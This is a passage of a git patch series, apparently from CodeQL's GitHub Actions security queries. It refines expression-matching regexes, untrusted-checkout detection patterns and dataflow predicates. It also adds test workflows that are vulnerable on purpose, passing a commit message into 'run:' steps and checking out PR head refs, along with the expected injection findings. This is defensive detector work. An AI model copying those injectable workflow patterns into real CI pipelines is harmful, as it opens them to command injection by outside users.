"\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", ], _, _) ) } From 3e2dffce8be696ae9a22b6605192aca3f85c728b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:57:43 +0100 Subject: [PATCH 0100/1267] Rename ContextExpression to SimpleReferenceExpression --- ql/lib/codeql/actions/Ast.qll | 14 ++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 53 ++++++++++++------- .../dataflow/internal/DataFlowPrivate.qll | 2 +- 3 files changed, 42 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 19d1924731a..70424a46f95 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -226,20 +226,20 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { string getFieldName() { result = super.getFieldName() } AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } -class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } -class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } -class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } -class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } -class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } +class MatrixExpression extends SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9a97a1c45b4..1f206c964eb 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -19,24 +19,18 @@ int partialLineLengthSum(string text, int i) { result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(YamlString s, int offset) { +string getADelimitedExpression(YamlString s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) } private newtype TAstNode = TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { - raw = getASimpleReferenceExpression(value, exprOffset) and + raw = getADelimitedExpression(value, exprOffset) and exists(YamlMapping m | ( exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) @@ -789,11 +783,29 @@ class RunImpl extends StepImpl { } } +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class ContextExpressionImpl extends ExpressionImpl { +abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); @@ -829,7 +841,7 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsExpressionImpl extends ContextExpressionImpl { +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string stepId; string fieldName; @@ -842,7 +854,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } } @@ -852,7 +864,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsExpressionImpl extends ContextExpressionImpl { +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { JobImpl neededJob; string fieldName; @@ -866,7 +878,10 @@ class NeedsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob().getANeededJob() = neededJob and + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and ( // regular jobs neededJob.getOutputs() = result @@ -882,7 +897,7 @@ class NeedsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsExpressionImpl extends ContextExpressionImpl { +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string jobId; string fieldName; @@ -908,7 +923,7 @@ class JobsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsExpressionImpl extends ContextExpressionImpl { +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { @@ -933,7 +948,7 @@ class InputsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvExpressionImpl extends ContextExpressionImpl { +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { @@ -956,7 +971,7 @@ class EnvExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixExpressionImpl extends ContextExpressionImpl { +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; MatrixExpressionImpl() { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index bda55da5c82..f1657717e04 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -271,7 +271,7 @@ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(ContextExpression access | + exists(SimpleReferenceExpression access | ( access instanceof NeedsExpression or access instanceof StepsExpression or From 8e2c1a4f4ed140e5aae014936a19039234f81dc1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:07 +0100 Subject: [PATCH 0101/1267] Expose predicates to check local flow --- .../actions/dataflow/internal/DataFlowPublic.qll | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b..8e8ed5d9280 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -174,3 +174,16 @@ class FieldContent extends Content, TFieldContent { override string toString() { result = name } } + +predicate hasLocalFlow(Node n1, Node n2) { + simpleLocalFlowStep(n1, n2) or + exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) +} + +predicate hasLocalFlowExpr(AstNode n1, AstNode n2) { + exists(Node dn1, Node dn2 | + dn1.asExpr() = n1 and + dn2.asExpr() = n2 and + hasLocalFlow(dn1, dn2) + ) +} From 03277cc24bfa901ad253f2893cc4dbb00e9ad16d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:44 +0100 Subject: [PATCH 0102/1267] Add test for self-referencing jobs --- .../CWE-094/.github/workflows/self_needs.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml new file mode 100644 index 00000000000..afd39605bb3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -0,0 +1,20 @@ +name: Test + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-22.04 + outputs: + job_output: ${{ steps.source.outputs.value }} + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event['head_commit']['message'] }} + find: 'foo' + replace: '' + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} From 7160f08222691a9182870200a6451b353604d0d3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:03:40 +0100 Subject: [PATCH 0103/1267] Update ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- .../query-tests/Security/CWE-829/.github/workflows/auto_ci.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index cb20cfe629b..28ffab637f0 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -68,7 +68,7 @@ jobs: uses: actions/checkout@v3 with: fetch-depth: 0 - ref: ${{ github.event.pull_request.head.ref }} + ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - name: Set up Python ${{ matrix.python-version }} From 3150f24d3fc3c283df4c372925edc97800092b2d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:21:16 +0100 Subject: [PATCH 0104/1267] Update tests and fix regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 11 +++++++++++ .../Security/CWE-094/ExpressionInjection.expected | 13 +++++++++++++ 3 files changed, 26 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1f206c964eb..ffe85b16f93 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -24,8 +24,8 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dfed1edb40a..aa9d9ae2fc4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d22e9833f52..d4fd27b18d4 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | @@ -259,6 +270,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 9ca1ac5bb9283d413eefc3bbb686949f69d90a4c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:02 +0100 Subject: [PATCH 0105/1267] Fix expression regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ffe85b16f93..084474b4020 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -24,8 +24,9 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1) + .trim() } private newtype TAstNode = From 35df9519e14a43946cca042b4286477f95c96b3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:47 +0100 Subject: [PATCH 0106/1267] Support more untrusted checkout cases --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 22 ++-- .../issue_comment_3rd_party_action.yml | 53 ++++++++ .../workflows/issue_comment_direct.yml | 46 +++++++ .../workflows/issue_comment_heuristic.yml | 50 ++++++++ .../workflows/issue_comment_octokit.yml | 114 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 + .../CWE-829/UntrustedCheckout.expected | 9 ++ 7 files changed, 293 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 4a0a4b6ade6..a24c80a2f60 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -14,6 +14,7 @@ */ import actions +import codeql.actions.DataFlow /** An If node that contains an actor, user or label check */ class ControlCheck extends If { @@ -23,6 +24,7 @@ class ControlCheck extends If { .regexpFind([ "\\bgithub\\.actor\\b", // actor "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.labels\\b", // label "\\bgithub\\.event\\.label\\.name\\b" // label @@ -47,22 +49,18 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", - - "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", @@ -79,7 +77,14 @@ abstract class PRHeadCheckoutStep extends Step { } class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + ( + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + or + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) + ) } } @@ -103,7 +108,10 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and + w.hasTriggerEvent([ + "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", + "workflow_run", "check_run", "check_suite", "workflow_call" + ]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml new file mode 100644 index 00000000000..4de47d6f17a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -0,0 +1,53 @@ +name: PR head from 3rd party action + +on: + workflow_call: + workflow_dispatch: + +jobs: + + test1: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: 